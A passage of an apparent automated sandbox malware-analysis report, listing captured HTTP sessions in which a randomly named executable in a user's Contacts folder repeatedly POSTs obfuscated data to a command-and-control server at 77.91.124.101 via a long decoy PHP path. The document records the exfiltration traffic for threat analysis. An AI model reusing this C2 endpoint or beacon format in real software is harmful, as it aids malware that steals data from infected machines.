                                                            Data Ascii: W[X][ZZX]WUWUWWVPZXAVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>=[=+.U>0+[8% *)\)3:P$*S&#1-;.?Z;Y8>&G''^)
                                                            Nov 21, 2023 04:47:45.219712019 CET | 247 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            27 | 192.168.2.5 | 49740 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:45.569263935 CET | 248 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:45.768819094 CET | 248 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:45.981430054 CET | 251 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            28 | 192.168.2.5 | 49741 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:46.303026915 CET | 252 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:46.500907898 CET | 253 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:46.712269068 CET | 256 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            29 | 192.168.2.5 | 49742 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:47.052269936 CET | 256 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:47.251118898 CET | 257 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:47.460270882 CET | 259 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            3 | 192.168.2.5 | 49715 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:28.130729914 CET | 154 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:28.329854012 CET | 155 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:28.534405947 CET | 158 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            30 | 192.168.2.5 | 49743 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:47.785492897 CET | 260 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:47.982127905 CET | 260 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:48.186844110 CET | 263 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            31 | 192.168.2.5 | 49744 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:48.504776955 CET | 264 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:48.706068993 CET | 264 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:48.910502911 CET | 267 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:48 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            32 | 192.168.2.5 | 49745 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:49.116487980 CET | 268 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:49.315845013 CET | 269 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:49.316200972 CET | 270 | OUT | Data Raw: 57 5b 58 5d 5e 5d 5a 5e 5d 57 55 57 55 57 57 50 50 52 58 48 56 5e 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X]^]Z^]WUWUWWPPRXHV^WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+.+9>33[8$ 5]?9'="'V>T-;(?;]8&G''^)
                                                            Nov 21, 2023 04:47:49.521035910 CET | 273 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 04 25 2f 0d 05 23 20 2b 56 3c 04 26 09 2d 10 00 40 3c 0a 21 11 26 04 28 5a 24 17 2a 0b 2b 59 38 5c 33 17 2c 1c 34 26 30 59 2a 1a 21 5a 0c 1d 25 03 21 3b 30 0f 28 07 23 04 3c 2d 06 5f 25 1f 01 58 28 00 05 16 23 33 01 5a 32 30 3f 09 2e 2f 2a 07 2e 28 3d 19 32 3c 2e 58 34 17 23 5f 0c 14 27 50 22 32 23 5b 23 0e 00 1c 22 34 2b 04 23 24 06 0a 24 13 24 55 31 3b 21 59 3c 16 0a 52 27 37 0a 51 33 29 20 0c 25 39 23 55 28 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%/# +V<&-@<!&(Z$*+Y8\3,4&0Y*!Z%!;0(#<-_%X(#3Z20?./*.(=2<.X4#_'P"2#[#"4+#$$$U1;!Y<R'7Q3) %9#U(*&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            33 | 77.91.124.101 | 80 | 192.168.2.5 | 49746 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:49.238934040 CET | 269 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:49.436714888 CET | 270 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:49.436917067 CET | 273 | OUT | Data Raw: 52 5c 58 5f 5e 5e 5a 51 5d 57 55 57 55 57 57 5a 50 5c 58 45 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\X_^^ZQ]WUWUWWZP\XEVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==+8&V=(;'*75?509& :-(</\8.&G''^)
                                                            Nov 21, 2023 04:47:49.643173933 CET | 274 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            34 | 77.91.124.101 | 80 | 192.168.2.5 | 49747 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:49.956535101 CET | 275 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:50.159806013 CET | 275 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:50.160186052 CET | 278 | OUT | Data Raw: 57 58 58 5d 5b 59 5a 50 5d 57 55 57 55 58 57 54 50 5b 58 48 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX][YZP]WUWUXWTP[XHVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+5+]2W=3[/7&Z :><0>'.S0>R.;*]+?7\/>&G''^)?
                                                            Nov 21, 2023 04:47:50.364954948 CET | 278 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            35 | 192.168.2.5 | 49749 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:50.690767050 CET | 279 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:50.889306068 CET | 279 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:50.889525890 CET | 282 | OUT | Data Raw: 52 5d 58 5a 5e 5d 5f 5d 5d 57 55 57 55 5c 57 57 50 5f 58 41 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XZ^]_]]WUWU\WWP_XAVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)85X+))86 :+&3=!$ =-+<X8>&G''^)/
                                                            Nov 21, 2023 04:47:51.094454050 CET | 287 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            36 | 192.168.2.5 | 49750 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:51.409622908 CET | 287 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:51.606362104 CET | 314 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:51.606614113 CET | 317 | OUT | Data Raw: 57 5f 5d 5e 5e 58 5a 59 5d 57 55 57 55 5e 57 52 50 5e 58 46 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_]^^XZY]WUWU^WRP^XFVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)(Y?**37\,%7*9+-&-$2V:)?? ,&G''^)#
                                                            Nov 21, 2023 04:47:51.809705973 CET | 317 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3677.91.124.10180192.168.2.549750C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:51.409622908 CET287OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:51.606362104 CET314INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:51.606614113 CET317OUTData Raw: 57 5f 5d 5e 5e 58 5a 59 5d 57 55 57 55 5e 57 52 50 5e 58 46 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_]^^XZY]WUWU^WRP^XFVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)(Y?**37\,%7*9+-&-$2V:)?? ,&G''^)#
                                                            Nov 21, 2023 04:47:51.809705973 CET | 317 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            37 | 192.168.2.5 | 49751 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:52.133124113 CET | 318 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:52.332041979 CET | 318 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:52.334084988 CET | 321 | OUT | Data Raw: 52 5a 58 5c 5b 52 5f 5c 5d 57 55 57 55 56 57 52 50 53 58 41 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZX\[R_\]WUWUVWRPSXAVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*([(;>0;\/$&7*1_?&S0>>30,;!+7,>&G''^)
                                                            Nov 21, 2023 04:47:52.540139914 CET | 321 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            38 | 192.168.2.5 | 49752 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:52.878020048 CET | 322 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:53.074857950 CET | 322 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:53.075289011 CET | 325 | OUT | Data Raw: 52 58 5d 59 5e 59 5a 59 5d 57 55 57 55 5a 57 5b 50 5d 58 49 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RX]Y^YZY]WUWUZW[P]XIVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)5?:T></-76+#!'.-&0W.+<,8-.&G''^)7
                                                            Nov 21, 2023 04:47:53.278687954 CET | 325 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            39 | 77.91.124.101 | 80 | 192.168.2.5 | 49753 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:53.596347094 CET | 326 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:53.794019938 CET | 326 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:53.794276953 CET | 328 | OUT | Data Raw: 57 5e 58 51 5b 5b 5a 59 5d 57 55 57 55 5a 57 5b 50 5e 58 48 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
